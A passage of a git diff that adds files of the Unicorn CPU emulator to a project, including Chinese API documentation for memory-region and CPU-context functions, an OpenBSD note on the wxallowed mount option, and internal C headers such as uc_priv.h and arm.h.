指向@regions中包含的uc_mem_region结构体的数量的指针 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码分析 + +```c +uint32_t uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count) +{ + uint32_t i; + uc_mem_region *r = NULL; + + *count = uc->mapped_block_count; + + if (*count) { + r = g_malloc0(*count * sizeof(uc_mem_region)); + if (r == NULL) { + // 内存不足 + return UC_ERR_NOMEM; + } + } + + for (i = 0; i < *count; i++) { + r[i].begin = uc->mapped_blocks[i]->addr; + r[i].end = uc->mapped_blocks[i]->end - 1; + r[i].perms = uc->mapped_blocks[i]->perms; + } + + *regions = r; + + return UC_ERR_OK; +} +``` + +使用示例: + +```cpp +#include <iostream> +#include <string> +#include "unicorn/unicorn.h" +using namespace std; + +int main() +{ + uc_err err; + uc_engine* uc; + + if ((err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc))) { + uc_perror("uc_open", err); + return 1; + } + + if ((err = uc_mem_map(uc, BASE, 0x1000, UC_PROT_ALL))) { + uc_perror("uc_mem_map", err); + return 1; + } + + uc_mem_region *region; + uint32_t count; + + if ((err = uc_mem_regions(uc, ®ion, &count))) { + uc_perror("uc_mem_regions", err); + return 1; + } + + cout << "起始地址: 0x" << hex << region->begin << " 结束地址: 0x" << hex << region->end << " 内存权限: " <<region->perms << " 已申请内存块数: " << count << endl; + + if ((err = uc_free(region))) { ////注意释放内存 + uc_perror("uc_free", err); + return 1; + } + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/kbrF7NdV6LDxnYI.png) + + + +### uc_free + +```c +uc_err uc_free(void *mem); +``` + +释放由 uc_context_alloc 和 uc_mem_regions 申请的内存 + +``` +@mem: 由uc_context_alloc (返回 *context), 或由 uc_mem_regions (返回 *regions)申请的内存 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_free(void *mem) +{ + g_free(mem); + return UC_ERR_OK; +} + +void g_free(gpointer ptr) +{ + free(ptr); +} +``` + +使用示例同uc_mem_regions + + + +### uc_context_alloc + +```c +uc_err uc_context_alloc(uc_engine *uc, uc_context **context); +``` + +分配一个可以与uc_context_{save,restore}一起使用的区域来执行CPU上下文的快速保存/回滚,包括寄存器和内部元数据。上下文不能在具有不同架构或模式的引擎实例之间共享。 + +``` +@uc: uc_open() 返回的句柄 +@context: 指向uc_engine*的指针。当这个函数成功返回时,将使用指向新上下文的指针更新它。之后必须使用uc_free()释放这些分配的内存。 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_context_alloc(uc_engine *uc, uc_context **context) +{ + struct uc_context **_context = context; + size_t size = cpu_context_size(uc->arch, uc->mode); + + *_context = malloc(size + sizeof(uc_context)); + if (*_context) { + (*_context)->size = size; + return UC_ERR_OK; + } else { + return UC_ERR_NOMEM; + } +} +``` + +使用示例 + +```cpp +#include <iostream> +#include <string> +#include "unicorn/unicorn.h" +using namespace std; + +#define ADDRESS 0x1000 +#define X86_CODE32_INC "\x40" // INC eax + +int main() +{ + uc_engine* uc; + uc_context* context; + uc_err err; + + int r_eax = 0x1; // EAX 寄存器 + + printf("===================================\n"); + printf("Save/restore CPU context in opaque blob\n"); + + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err) { + printf("Failed on uc_open() with error returned: %u\n", err); + return 0; + } + + uc_mem_map(uc, ADDRESS, 8 * 1024, UC_PROT_ALL); + + if (uc_mem_write(uc, ADDRESS, X86_CODE32_INC, sizeof(X86_CODE32_INC) - 1)) { + printf("Failed to write emulation code to memory, quit!\n"); + return 0; + } + + // 初始化寄存器 + uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); + + printf(">>> Running emulation for the first time\n"); + + err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INC) - 1, 0, 0); + if (err) { + printf("Failed on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + } + + printf(">>> Emulation done. Below is the CPU context\n"); + + uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); + printf(">>> EAX = 0x%x\n", r_eax); + + // 申请并保存 CPU 上下文 + printf(">>> Saving CPU context\n"); + + err = uc_context_alloc(uc, &context); + if (err) { + printf("Failed on uc_context_alloc() with error returned: %u\n", err); + return 0; + } + + err = uc_context_save(uc, context); + if (err) { + printf("Failed on uc_context_save() with error returned: %u\n", err); + return 0; + } + + printf(">>> Running emulation for the second time\n"); + + err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INC) - 1, 0, 0); + if (err) { + printf("Failed on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + } + + printf(">>> Emulation done. Below is the CPU context\n"); + + uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); + printf(">>> EAX = 0x%x\n", r_eax); + + // 恢复 CPU 上下文 + err = uc_context_restore(uc, context); + if (err) { + printf("Failed on uc_context_restore() with error returned: %u\n", err); + return 0; + } + + printf(">>> CPU context restored. Below is the CPU context\n"); + + uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); + printf(">>> EAX = 0x%x\n", r_eax); + + // 释放 CPU 上下文 + err = uc_free(context); + if (err) { + printf("Failed on uc_free() with error returned: %u\n", err); + return 0; + } + + uc_close(uc); + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/juNPWvwGUlraKRh.png) + + + +### uc_context_save + +```c +uc_err uc_context_save(uc_engine *uc, uc_context *context); +``` + +保存当前CPU上下文 + +``` +@uc: uc_open() 返回的句柄 +@context: uc_context_alloc() 返回的句柄 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_context_save(uc_engine *uc, uc_context *context) +{ + struct uc_context *_context = context; + memcpy(_context->data, uc->cpu->env_ptr, _context->size); + return UC_ERR_OK; +} +``` + +使用示例同uc_context_alloc() + + + +### uc_context_restore + +```c +uc_err uc_context_restore(uc_engine *uc, uc_context *context); +``` + +恢复已保存的CPU上下文 + +``` +@uc: uc_open() 返回的句柄 +@context: uc_context_alloc() 返回并且已使用 uc_context_save 保存的句柄 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_context_restore(uc_engine *uc, uc_context *context) +{ + struct uc_context *_context = context; + memcpy(uc->cpu->env_ptr, _context->data, _context->size); + return UC_ERR_OK; +} +``` + +使用示例同uc_context_alloc() + + + +### uc_context_size + +```c +size_t uc_context_size(uc_engine *uc); +``` + +返回存储cpu上下文所需的大小。可以用来分配一个缓冲区来包含cpu上下文,并直接调用uc_context_save。 + +``` +@uc: uc_open() 返回的句柄 + +@return 存储cpu上下文所需的大小,类型为 size_t. +``` + +源码实现 + +```c +size_t uc_context_size(uc_engine *uc) +{ + return cpu_context_size(uc->arch, uc->mode); +} + +static size_t cpu_context_size(uc_arch arch, uc_mode mode) +{ + switch (arch) { +#ifdef UNICORN_HAS_M68K + case UC_ARCH_M68K: return M68K_REGS_STORAGE_SIZE; +#endif +#ifdef UNICORN_HAS_X86 + case UC_ARCH_X86: return X86_REGS_STORAGE_SIZE; +#endif +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: return mode & UC_MODE_BIG_ENDIAN ? ARM_REGS_STORAGE_SIZE_armeb : ARM_REGS_STORAGE_SIZE_arm; +#endif +#ifdef UNICORN_HAS_ARM64 + case UC_ARCH_ARM64: return mode & UC_MODE_BIG_ENDIAN ? ARM64_REGS_STORAGE_SIZE_aarch64eb : ARM64_REGS_STORAGE_SIZE_aarch64; +#endif +#ifdef UNICORN_HAS_MIPS + case UC_ARCH_MIPS: + if (mode & UC_MODE_MIPS64) { + if (mode & UC_MODE_BIG_ENDIAN) { + return MIPS64_REGS_STORAGE_SIZE_mips64; + } else { + return MIPS64_REGS_STORAGE_SIZE_mips64el; + } + } else { + if (mode & UC_MODE_BIG_ENDIAN) { + return MIPS_REGS_STORAGE_SIZE_mips; + } else { + return MIPS_REGS_STORAGE_SIZE_mipsel; + } + } +#endif +#ifdef UNICORN_HAS_SPARC + case UC_ARCH_SPARC: return mode & UC_MODE_SPARC64 ? SPARC64_REGS_STORAGE_SIZE : SPARC_REGS_STORAGE_SIZE; +#endif + default: return 0; + } +} +``` + +使用示例同uc_context_alloc() + + + diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/OPENBSD-NOTES.md b/ai_anti_malware/unicorn/unicorn-master/docs/OPENBSD-NOTES.md new file mode 100644 index 0000000..ab66566 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/docs/OPENBSD-NOTES.md @@ -0,0 +1,69 @@ +## Circumventing OpenBSD 6.0's W^X Protections + +OpenBSD 6.0 and above enforces data-execution prevention (DEP or +W^X) by default, preventing memory from being mapped as +simultaneously writeable and executable (i.e., W|X). This causes +problems for Unicorn, if left in place. If you're seeing +errors like the following: +``` +/home/git/unicorn >> ./sample_arm +Emulate ARM code +zsh: abort (core dumped) ./sample_arm +``` +then W^X is likely the culprit. If we run it again with ktrace +and look at the output with kdump, we see that this is indeed +the issue: +``` + 82192 sample_arm CALL mmap(0,0x800000,0x7<PROT_READ|PROT_WRITE|PROT_EXEC>,0x1002<MAP_PRIVATE|MAP_ANON>,-1,0) + 82192 sample_arm PSIG SIGABRT SIG_DFL + 82192 sample_arm NAMI "sample_arm.core" +``` +Right now, we're in the /home filesystem. Let's look at its mount +options in /etc/fstab: +``` +1234abcdcafef00d.g /home ffs rw,nodev,nosuid 1 2 +``` +If we edit the options to include ```wxallowed```, appending +this after nosuid, for example, then we're golden: +``` +1234abcdcafef00d.g /home ffs rw,nodev,nosuid,wxallowed 1 2 +``` + +Note that this *does* diminish the security of your filesystem +somewhat, and so if you're particularly particular about such +things, we recommend setting up a dedicated filesystem for +any activities that require ```(W|X)```, such as unicorn +development and testing. + +In order for these changes to take effect, you will need to +reboot. + +_Time passes..._ + +Let's try this again. There's no need to recompile unicorn or +the samples, as (W^X) is strictly a runtime issue. + +First, we double check to see if /home has been mounted with +wxallowed: +``` +/home >> mount | grep home +/dev/sd3g on /home type ffs (local, nodev, nosuid, wxallowed) +``` +Okay, now let's try running that sample again... +``` +/home/git/unicorn/samples >> ./sample_arm +Emulate ARM code +>>> Tracing basic block at 0x10000, block size = 0x8 +>>> Tracing instruction at 0x10000, instruction size = 0x4 +>>> Emulation done. Below is the CPU context +>>> R0 = 0x37 +>>> R1 = 0x3456 +========================== +Emulate THUMB code +>>> Tracing basic block at 0x10000, block size = 0x2 +>>> Tracing instruction at 0x10000, instruction size = 0x2 +>>> Emulation done. Below is the CPU context +>>> SP = 0x1228 +``` +works fine. + diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/README.md b/ai_anti_malware/unicorn/unicorn-master/docs/README.md new file mode 100644 index 0000000..f80f57d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/docs/README.md @@ -0,0 +1,17 @@ +Documention of Unicorn engine. + +* How to compile & install Unicorn. + + http://unicorn-engine.org/docs/ + +* Tutorial on programming with C & Python languages. + + http://unicorn-engine.org/docs/tutorial.html + +* Compare Unicorn & QEMU + + http://unicorn-engine.org/docs/beyond_qemu.html + +* Micro Uncorn-Engine API Documentation in Chinese + + https://github.com/kabeor/Micro-Unicorn-Engine-API-Documentation diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/unicorn-logo.png b/ai_anti_malware/unicorn/unicorn-master/docs/unicorn-logo.png new file mode 100644 index 0000000..3e86b3c Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/unicorn-logo.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/unicorn-logo.txt b/ai_anti_malware/unicorn/unicorn-master/docs/unicorn-logo.txt new file mode 100644 index 0000000..3b6e96a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/docs/unicorn-logo.txt @@ -0,0 +1,19 @@ + /\'. _,. + |:\ \. .'_/ + _.- |(\\ \ .'_.' + _.-' ,__\\ \\_),/ _/ + _:.' .:::::::.___ ,' + // ' ./::::::\<o\( + // /|::/ `"( \ + ;/_ / ::( `. `. + /_'/ | ::::\ `. \ + '// '\ :::':\_ _, ` _'- + / | '\.:/|::::.._ `-__ )/ + | | \;| \:( '.(_ \_) + | | \( \::. '-) + \ \ , '""""---. + \ \ \ , _.-...) + \ \/\. \:,___.-'..:::/ + \ |\\:,.\:::::'.::::/ + ` `:;::::'.::;::' + '":;:""' diff --git a/ai_anti_malware/unicorn/unicorn-master/include/list.h b/ai_anti_malware/unicorn/unicorn-master/include/list.h new file mode 100644 index 0000000..5699e0a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/list.h @@ -0,0 +1,33 @@ +#ifndef UC_LLIST_H +#define UC_LLIST_H + +#include "unicorn/platform.h" + +struct list_item { + struct list_item *next; + void *data; +}; + +struct list { + struct list_item *head, *tail; +}; + +// create a new list +struct list *list_new(void); + +// removed linked list nodes but does not free their content +void list_clear(struct list *list); + +// insert a new item at the begin of the list. +void *list_insert(struct list *list, void *data); + +// append a new item at the end of the list. +void *list_append(struct list *list, void *data); + +// returns true if entry was removed, false otherwise +bool list_remove(struct list *list, void *data); + +// returns true if the data exists in the list +bool list_exists(struct list *list, void *data); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/include/qemu.h b/ai_anti_malware/unicorn/unicorn-master/include/qemu.h new file mode 100644 index 0000000..0d7b5dd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/qemu.h @@ -0,0 +1,51 @@ +/* By Dang Hoang Vu <dang.hvu -at- gmail.com>, 2015 */ + +#ifndef UC_QEMU_H +#define UC_QEMU_H + +struct uc_struct; + +#define OPC_BUF_SIZE 640 + +#include "sysemu/sysemu.h" +#include "sysemu/cpus.h" +#include "exec/cpu-common.h" +#include "exec/memory.h" + +#include "qemu/thread.h" +#include "include/qom/cpu.h" + +#include "vl.h" + +// This two struct is originally from qemu/include/exec/cpu-all.h +// Temporarily moved here since there is circular inclusion. +typedef struct RAMBlock { + struct MemoryRegion *mr; + uint8_t *host; + ram_addr_t offset; + ram_addr_t length; + uint32_t flags; + char idstr[256]; + /* Reads can take either the iothread or the ramlist lock. + * Writes must take both locks. + */ + QTAILQ_ENTRY(RAMBlock) next; + int fd; +} RAMBlock; + +typedef struct { + MemoryRegion *mr; + void *buffer; + hwaddr addr; + hwaddr len; +} BounceBuffer; + +typedef struct RAMList { + /* Protected by the iothread lock. */ + unsigned long *dirty_memory[DIRTY_MEMORY_NUM]; + RAMBlock *mru_block; + QTAILQ_HEAD(, RAMBlock) blocks; + uint32_t version; +} RAMList; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/include/uc_priv.h b/ai_anti_malware/unicorn/unicorn-master/include/uc_priv.h new file mode 100644 index 0000000..77773b7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/uc_priv.h @@ -0,0 +1,269 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ + +#ifndef UC_PRIV_H +#define UC_PRIV_H + +#include "unicorn/platform.h" +#include <stdio.h> + +#include "qemu.h" +#include "unicorn/unicorn.h" +#include "list.h" + +// These are masks of supported modes for each cpu/arch. +// They should be updated when changes are made to the uc_mode enum typedef. +#define UC_MODE_ARM_MASK (UC_MODE_ARM|UC_MODE_THUMB|UC_MODE_LITTLE_ENDIAN|UC_MODE_MCLASS \ + |UC_MODE_ARM926|UC_MODE_ARM946|UC_MODE_ARM1176|UC_MODE_BIG_ENDIAN) +#define UC_MODE_MIPS_MASK (UC_MODE_MIPS32|UC_MODE_MIPS64|UC_MODE_LITTLE_ENDIAN|UC_MODE_BIG_ENDIAN) +#define UC_MODE_X86_MASK (UC_MODE_16|UC_MODE_32|UC_MODE_64|UC_MODE_LITTLE_ENDIAN) +#define UC_MODE_PPC_MASK (UC_MODE_PPC64|UC_MODE_BIG_ENDIAN) +#define UC_MODE_SPARC_MASK (UC_MODE_SPARC32|UC_MODE_SPARC64|UC_MODE_BIG_ENDIAN) +#define UC_MODE_M68K_MASK (UC_MODE_BIG_ENDIAN) + +#define ARR_SIZE(a) (sizeof(a)/sizeof(a[0])) + +#define READ_QWORD(x) ((uint64)x) +#define READ_DWORD(x) (x & 0xffffffff) +#define READ_WORD(x) (x & 0xffff) +#define READ_BYTE_H(x) ((x & 0xffff) >> 8) +#define READ_BYTE_L(x) (x & 0xff) +#define WRITE_DWORD(x, w) (x = (x & ~0xffffffffLL) | (w & 0xffffffff)) +#define WRITE_WORD(x, w) (x = (x & ~0xffff) | (w & 0xffff)) +#define WRITE_BYTE_H(x, b) (x = (x & ~0xff00) | ((b & 0xff) << 8)) +#define WRITE_BYTE_L(x, b) (x = (x & ~0xff) | (b & 0xff)) + + +typedef struct ModuleEntry { + void (*init)(void); + QTAILQ_ENTRY(ModuleEntry) node; + module_init_type type; +} ModuleEntry; + +typedef QTAILQ_HEAD(, ModuleEntry) ModuleTypeList; + +typedef uc_err (*query_t)(struct uc_struct *uc, uc_query_type type, size_t *result); + +// return 0 on success, -1 on failure +typedef int (*reg_read_t)(struct uc_struct *uc, unsigned int *regs, void **vals, int count); +typedef int (*reg_write_t)(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count); + +typedef void (*reg_reset_t)(struct uc_struct *uc); + +typedef bool (*uc_write_mem_t)(AddressSpace *as, hwaddr addr, const uint8_t *buf, int len); + +typedef bool (*uc_read_mem_t)(AddressSpace *as, hwaddr addr, uint8_t *buf, int len); + +typedef void (*uc_args_void_t)(void*); + +typedef void (*uc_args_uc_t)(struct uc_struct*); +typedef int (*uc_args_int_uc_t)(struct uc_struct*); + +typedef bool (*uc_args_tcg_enable_t)(struct uc_struct*); + +typedef void (*uc_args_uc_long_t)(struct uc_struct*, unsigned long); + +typedef void (*uc_args_uc_u64_t)(struct uc_struct *, uint64_t addr); + +typedef MemoryRegion* (*uc_args_uc_ram_size_t)(struct uc_struct*, hwaddr begin, size_t size, uint32_t perms); + +typedef MemoryRegion* (*uc_args_uc_ram_size_ptr_t)(struct uc_struct*, hwaddr begin, size_t size, uint32_t perms, void *ptr); + +typedef void (*uc_mem_unmap_t)(struct uc_struct*, MemoryRegion *mr); + +typedef void (*uc_readonly_mem_t)(MemoryRegion *mr, bool readonly); + +// which interrupt should make emulation stop? +typedef bool (*uc_args_int_t)(int intno); + +// some architecture redirect virtual memory to physical memory like Mips +typedef uint64_t (*uc_mem_redirect_t)(uint64_t address); + +// validate if Unicorn supports hooking a given instruction +typedef bool(*uc_insn_hook_validate)(uint32_t insn_enum); + +struct hook { + int type; // UC_HOOK_* + int insn; // instruction for HOOK_INSN + int refs; // reference count to free hook stored in multiple lists + bool to_delete; // set to true when the hook is deleted by the user. The destruction of the hook is delayed. + uint64_t begin, end; // only trigger if PC or memory access is in this address (depends on hook type) + void *callback; // a uc_cb_* type + void *user_data; +}; + +// hook list offsets +// mirrors the order of uc_hook_type from include/unicorn/unicorn.h +enum uc_hook_idx { + UC_HOOK_INTR_IDX, + UC_HOOK_INSN_IDX, + UC_HOOK_CODE_IDX, + UC_HOOK_BLOCK_IDX, + UC_HOOK_MEM_READ_UNMAPPED_IDX, + UC_HOOK_MEM_WRITE_UNMAPPED_IDX, + UC_HOOK_MEM_FETCH_UNMAPPED_IDX, + UC_HOOK_MEM_READ_PROT_IDX, + UC_HOOK_MEM_WRITE_PROT_IDX, + UC_HOOK_MEM_FETCH_PROT_IDX, + UC_HOOK_MEM_READ_IDX, + UC_HOOK_MEM_WRITE_IDX, + UC_HOOK_MEM_FETCH_IDX, + UC_HOOK_MEM_READ_AFTER_IDX, + UC_HOOK_INSN_INVALID_IDX, + + UC_HOOK_MAX, +}; + +#define HOOK_FOREACH_VAR_DECLARE \ + struct list_item *cur + +// for loop macro to loop over hook lists +#define HOOK_FOREACH(uc, hh, idx) \ + for ( \ + cur = (uc)->hook[idx##_IDX].head; \ + cur != NULL && ((hh) = (struct hook *)cur->data); \ + cur = cur->next) + +// if statement to check hook bounds +#define HOOK_BOUND_CHECK(hh, addr) \ + ((((addr) >= (hh)->begin && (addr) <= (hh)->end) \ + || (hh)->begin > (hh)->end) && !((hh)->to_delete)) + +#define HOOK_EXISTS(uc, idx) ((uc)->hook[idx##_IDX].head != NULL) +#define HOOK_EXISTS_BOUNDED(uc, idx, addr) _hook_exists_bounded((uc)->hook[idx##_IDX].head, addr) + +static inline bool _hook_exists_bounded(struct list_item *cur, uint64_t addr) +{ + while (cur != NULL) { + if (HOOK_BOUND_CHECK((struct hook *)cur->data, addr)) + return true; + cur = cur->next; + } + return false; +} + +//relloc increment, KEEP THIS A POWER OF 2! +#define MEM_BLOCK_INCR 32 + +struct uc_struct { + uc_arch arch; + uc_mode mode; + uc_err errnum; // qemu/cpu-exec.c + AddressSpace as; + query_t query; + reg_read_t reg_read; + reg_write_t reg_write; + reg_reset_t reg_reset; + + uc_write_mem_t write_mem; + uc_read_mem_t read_mem; + uc_args_void_t release; // release resource when uc_close() + uc_args_uc_u64_t set_pc; // set PC for tracecode + uc_args_int_t stop_interrupt; // check if the interrupt should stop emulation + + uc_args_uc_t init_arch, cpu_exec_init_all; + uc_args_int_uc_t vm_start; + uc_args_tcg_enable_t tcg_enabled; + uc_args_uc_long_t tcg_exec_init; + uc_args_uc_ram_size_t memory_map; + uc_args_uc_ram_size_ptr_t memory_map_ptr; + uc_mem_unmap_t memory_unmap; + uc_readonly_mem_t readonly_mem; + uc_mem_redirect_t mem_redirect; + // TODO: remove current_cpu, as it's a flag for something else ("cpu running"?) + CPUState *cpu, *current_cpu; + + uc_insn_hook_validate insn_hook_validate; + + MemoryRegion *system_memory; // qemu/exec.c + MemoryRegion io_mem_rom; // qemu/exec.c + MemoryRegion io_mem_notdirty; // qemu/exec.c + MemoryRegion io_mem_unassigned; // qemu/exec.c + MemoryRegion io_mem_watch; // qemu/exec.c + RAMList ram_list; // qemu/exec.c + BounceBuffer bounce; // qemu/cpu-exec.c + volatile sig_atomic_t exit_request; // qemu/cpu-exec.c + bool global_dirty_log; // qemu/memory.c + /* This is a multi-level map on the virtual address space. + The bottom level has pointers to PageDesc. */ + void **l1_map; // qemu/translate-all.c + size_t l1_map_size; + /* code generation context */ + void *tcg_ctx; // for "TCGContext tcg_ctx" in qemu/translate-all.c + /* memory.c */ + unsigned memory_region_transaction_depth; + bool memory_region_update_pending; + bool ioeventfd_update_pending; + QTAILQ_HEAD(memory_listeners, MemoryListener) memory_listeners; + QTAILQ_HEAD(, AddressSpace) address_spaces; + MachineState *machine_state; + // qom/object.c + GHashTable *type_table; + Type type_interface; + Object *root; + Object *owner; + bool enumerating_types; + // util/module.c + ModuleTypeList init_type_list[MODULE_INIT_MAX]; + // hw/intc/apic_common.c + DeviceState *vapic; + int apic_no; + bool mmio_registered; + bool apic_report_tpr_access; + + // linked lists containing hooks per type + struct list hook[UC_HOOK_MAX]; + struct list hooks_to_del; + + // hook to count number of instructions for uc_emu_start() + uc_hook count_hook; + + size_t emu_counter; // current counter of uc_emu_start() + size_t emu_count; // save counter of uc_emu_start() + + uint64_t block_addr; // save the last block address we hooked + + int size_recur_mem; // size for mem access when in a recursive call + + bool init_tcg; // already initialized local TCGv variables? + bool stop_request; // request to immediately stop emulation - for uc_emu_stop() + bool quit_request; // request to quit the current TB, but continue to emulate - for uc_mem_protect() + bool emulation_done; // emulation is done by uc_emu_start() + bool timed_out; // emulation timed out, that can retrieve via uc_query(UC_QUERY_TIMEOUT) + QemuThread timer; // timer for emulation timeout + uint64_t timeout; // timeout for uc_emu_start() + + uint64_t invalid_addr; // invalid address to be accessed + int invalid_error; // invalid memory code: 1 = READ, 2 = WRITE, 3 = CODE + + uint64_t addr_end; // address where emulation stops (@end param of uc_emu_start()) + + int thumb; // thumb mode for ARM + // full TCG cache leads to middle-block break in the last translation? + bool block_full; + int size_arg; // what tcg arg slot do we need to update with the size of the block? + MemoryRegion **mapped_blocks; + uint32_t mapped_block_count; + uint32_t mapped_block_cache_index; + void *qemu_thread_data; // to support cross compile to Windows (qemu-thread-win32.c) + uint32_t target_page_size; + uint32_t target_page_align; + uint64_t next_pc; // save next PC for some special cases + bool hook_insert; // insert new hook at begin of the hook list (append by default) + struct list saved_contexts; // The contexts saved by this uc_struct. +}; + +// Metadata stub for the variable-size cpu context used with uc_context_*() +// We also save cpu->jmp_env, so emulation can be reentrant +struct uc_context { + size_t context_size; // size of the real internal context structure + size_t jmp_env_size; // size of cpu->jmp_env + struct uc_struct* uc; // the uc_struct which creates this context + char data[0]; // context + cpu->jmp_env +}; + +// check if this address is mapped in (via uc_mem_map()) +MemoryRegion *memory_mapping(struct uc_struct* uc, uint64_t address); + +#endif +/* vim: set ts=4 noet: */ diff --git a/ai_anti_malware/unicorn/unicorn-master/include/unicorn/arm.h b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/arm.h new file mode 100644 index 0000000..a0fd83e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/arm.h @@ -0,0 +1,157 @@ +/* Unicorn Engine */ +/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_ARM_H +#define UNICORN_ARM_H + +#ifdef __cplusplus +extern "C" { +#endif + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> ARM registers +typedef enum uc_arm_reg { + UC_ARM_REG_INVALID = 0, + UC_ARM_REG_APSR, + UC_ARM_REG_APSR_NZCV, + UC_ARM_REG_CPSR, + UC_ARM_REG_FPEXC, + UC_ARM_REG_FPINST, + UC_ARM_REG_FPSCR, + UC_ARM_REG_FPSCR_NZCV, + UC_ARM_REG_FPSID, + UC_ARM_REG_ITSTATE, + UC_ARM_REG_LR, + UC_ARM_REG_PC, + UC_ARM_REG_SP, + UC_ARM_REG_SPSR, + UC_ARM_REG_D0, + UC_ARM_REG_D1, + UC_ARM_REG_D2, + UC_ARM_REG_D3, + UC_ARM_REG_D4, + UC_ARM_REG_D5, + UC_ARM_REG_D6, + UC_ARM_REG_D7, + UC_ARM_REG_D8, + UC_ARM_REG_D9, + UC_ARM_REG_D10, + UC_ARM_REG_D11, + UC_ARM_REG_D12, + UC_ARM_REG_D13, + UC_ARM_REG_D14, + UC_ARM_REG_D15, + UC_ARM_REG_D16, + UC_ARM_REG_D17, + UC_ARM_REG_D18, + UC_ARM_REG_D19, + UC_ARM_REG_D20, + UC_ARM_REG_D21, + UC_ARM_REG_D22, + UC_ARM_REG_D23, + UC_ARM_REG_D24, + UC_ARM_REG_D25, + UC_ARM_REG_D26, + UC_ARM_REG_D27, + UC_ARM_REG_D28, + UC_ARM_REG_D29, + UC_ARM_REG_D30, + UC_ARM_REG_D31, + UC_ARM_REG_FPINST2, + UC_ARM_REG_MVFR0, + UC_ARM_REG_MVFR1, + UC_ARM_REG_MVFR2, + UC_ARM_REG_Q0, + UC_ARM_REG_Q1, + UC_ARM_REG_Q2, + UC_ARM_REG_Q3, + UC_ARM_REG_Q4, + UC_ARM_REG_Q5, + UC_ARM_REG_Q6, + UC_ARM_REG_Q7, + UC_ARM_REG_Q8, + UC_ARM_REG_Q9, + UC_ARM_REG_Q10, + UC_ARM_REG_Q11, + UC_ARM_REG_Q12, + UC_ARM_REG_Q13, + UC_ARM_REG_Q14, + UC_ARM_REG_Q15, + UC_ARM_REG_R0, + UC_ARM_REG_R1, + UC_ARM_REG_R2, + UC_ARM_REG_R3, + UC_ARM_REG_R4, + UC_ARM_REG_R5, + UC_ARM_REG_R6, + UC_ARM_REG_R7, + UC_ARM_REG_R8, + UC_ARM_REG_R9, + UC_ARM_REG_R10, + UC_ARM_REG_R11, + UC_ARM_REG_R12, + UC_ARM_REG_S0, + UC_ARM_REG_S1, + UC_ARM_REG_S2, + UC_ARM_REG_S3, + UC_ARM_REG_S4, + UC_ARM_REG_S5, + UC_ARM_REG_S6, + UC_ARM_REG_S7, + UC_ARM_REG_S8, + UC_ARM_REG_S9, + UC_ARM_REG_S10, + UC_ARM_REG_S11, + UC_ARM_REG_S12, + UC_ARM_REG_S13, + UC_ARM_REG_S14, + UC_ARM_REG_S15, + UC_ARM_REG_S16, + UC_ARM_REG_S17, + UC_ARM_REG_S18, + UC_ARM_REG_S19, + UC_ARM_REG_S20, + UC_ARM_REG_S21, + UC_ARM_REG_S22, + UC_ARM_REG_S23, + UC_ARM_REG_S24, + UC_ARM_REG_S25, + UC_ARM_REG_S26, + UC_ARM_REG_S27, + UC_ARM_REG_S28, + UC_ARM_REG_S29, + UC_ARM_REG_S30, + UC_ARM_REG_S31, + + UC_ARM_REG_C1_C0_2, + UC_ARM_REG_C13_C0_2, + UC_ARM_REG_C13_C0_3, + + UC_ARM_REG_IPSR, + UC_ARM_REG_MSP, + UC_ARM_REG_PSP, + UC_ARM_REG_CONTROL, + UC_ARM_REG_ENDING, // <-- mark the end of the list or registers + + //> alias registers + UC_ARM_REG_R13 = UC_ARM_REG_SP, + UC_ARM_REG_R14 = UC_ARM_REG_LR, + UC_ARM_REG_R15 = UC_ARM_REG_PC, + + UC_ARM_REG_SB = UC_ARM_REG_R9, + UC_ARM_REG_SL = UC_ARM_REG_R10, + UC_ARM_REG_FP = UC_ARM_REG_R11, + UC_ARM_REG_IP = UC_ARM_REG_R12, +} uc_arm_reg; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/include/unicorn/arm64.h b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/arm64.h new file mode 100644 index 0000000..0f66518 